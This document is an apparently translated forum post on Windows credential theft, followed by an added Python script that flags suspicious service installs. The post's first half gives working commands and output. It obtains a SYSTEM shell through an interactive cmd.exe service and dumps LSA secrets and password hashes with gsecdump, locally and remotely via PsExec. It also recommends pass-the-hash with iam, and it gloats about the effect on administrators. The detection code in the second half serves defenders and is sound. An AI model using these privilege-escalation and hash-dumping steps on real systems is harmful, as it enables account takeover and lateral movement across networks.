To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to load the hashes just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are good; admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, don't actually need to be cracked at all; it's just a matter of using the tool. As the original article puts it, whether the password is 4 characters or 127, once you have the hash it's 100% done.
Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
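From the detection side, the two things above leave a clear trace on the target: the `sc create ... type= interact` step installs a service whose image is cmd.exe with the SERVICE_INTERACTIVE_PROCESS bit set, and the PsExec `-s -c` step installs its own PSEXESVC service. The following Python is an added example, not part of the original post and not code from gsecdump, PsExec or Sysinternals. It triages constructed service-install records modelled on the fields of Security event 4697 / System event 7045 ("a service was installed"); the simplified key=value record format, the service names other than PSEXESVC, and the paths are constructed sample data, and the SERVICE_* bit values are the real winsvc.h constants.

```python
import re
from dataclasses import dataclass, field

# Service-type bits from winsvc.h (real Win32 constants).
SERVICE_WIN32_OWN_PROCESS = 0x010
SERVICE_INTERACTIVE_PROCESS = 0x100   # what "sc create ... type= interact" sets

# Images that should never be a service's executable; a shell registered
# with "sc create ... binpath= cmd.exe" is exactly the pattern above.
SHELL_IMAGES = {"cmd.exe", "command.com", "powershell.exe", "cscript.exe", "wscript.exe"}

# Service names that PsExec-style remote execution registers on the target.
REMOTE_EXEC_SERVICES = {"psexesvc"}

# Constructed sample records (not real log output) with the fields of
# event 4697/7045 flattened to key=value; ServiceType is the raw type mask.
SAMPLE_EVENTS = r"""
EventID=4697 ServiceName=shellcmdline ServiceFileName="C:\WINDOWS\system32\cmd.exe /K start" ServiceType=0x110 StartType=3 Account=LocalSystem
EventID=4697 ServiceName=PSEXESVC ServiceFileName="%SystemRoot%\PSEXESVC.exe" ServiceType=0x10 StartType=3 Account=LocalSystem
EventID=4697 ServiceName=Spooler ServiceFileName="C:\WINDOWS\system32\spoolsv.exe" ServiceType=0x110 StartType=2 Account=LocalSystem
EventID=4697 ServiceName=backup ServiceFileName="C:\Program Files\Backup\agent.exe" ServiceType=0x10 StartType=2 Account=LocalSystem
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class ServiceInstall:
    name: str
    image_path: str
    service_type: int
    start_type: int
    account: str
    severity: str = "none"
    reasons: list = field(default_factory=list)


def parse_event(line):
    """Turn one key=value record into a ServiceInstall; None if it is not a service-install event."""
    fields = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
    if fields.get("EventID") not in ("4697", "7045"):
        return None
    return ServiceInstall(
        name=fields["ServiceName"],
        image_path=fields["ServiceFileName"],
        service_type=int(fields["ServiceType"], 16),
        start_type=int(fields["StartType"]),
        account=fields["Account"],
    )


def image_basename(image_path):
    """Executable name from a service command line, e.g. cmd.exe from 'C:\\...\\cmd.exe /K start'."""
    tokens = image_path.strip().strip('"').split()
    exe = ""
    # Accumulate tokens until the executable name is complete, so an
    # unquoted path with spaces (C:\Program Files\...) is not cut short.
    for tok in tokens:
        exe = f"{exe} {tok}".strip()
        if exe.lower().endswith((".exe", ".com", ".bat", ".cmd")):
            break
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(svc):
    """Attach reasons and a severity to one service-install record."""
    base = image_basename(svc.image_path)
    interactive = bool(svc.service_type & SERVICE_INTERACTIVE_PROCESS)
    remote_exec = svc.name.lower() in REMOTE_EXEC_SERVICES
    if base in SHELL_IMAGES:
        svc.reasons.append(f"service image is a shell/interpreter: {base}")
    if interactive:
        svc.reasons.append("SERVICE_INTERACTIVE_PROCESS set (sc ... type= interact)")
    if remote_exec:
        svc.reasons.append("PsExec-style remote execution service name")
    if base in SHELL_IMAGES or remote_exec:
        svc.severity = "high"
    elif interactive:
        # Legacy interactive services (e.g. an old Spooler) exist; review, don't page.
        svc.severity = "medium"
    return svc


def triage(log_text):
    """Map service name -> (severity, reasons) for every record that raised a reason."""
    findings = {}
    for line in log_text.strip().splitlines():
        svc = parse_event(line)
        if svc is None:
            continue
        assess(svc)
        if svc.reasons:
            findings[svc.name] = (svc.severity, svc.reasons)
    return findings


if __name__ == "__main__":
    for name, (severity, reasons) in triage(SAMPLE_EVENTS).items():
        print(f"[{severity}] {name}: " + "; ".join(reasons))
```

The cmd.exe service is scored high on the image alone, so it is caught even if the interactive bit is left out; PSEXESVC is scored on its name; and the interactive-only case is kept at medium because older Windows builds shipped legitimate interactive services, which is the false positive a practitioner would otherwise page on. A production version would read the real 4697/7045 XML rather than this constructed key=value rendering.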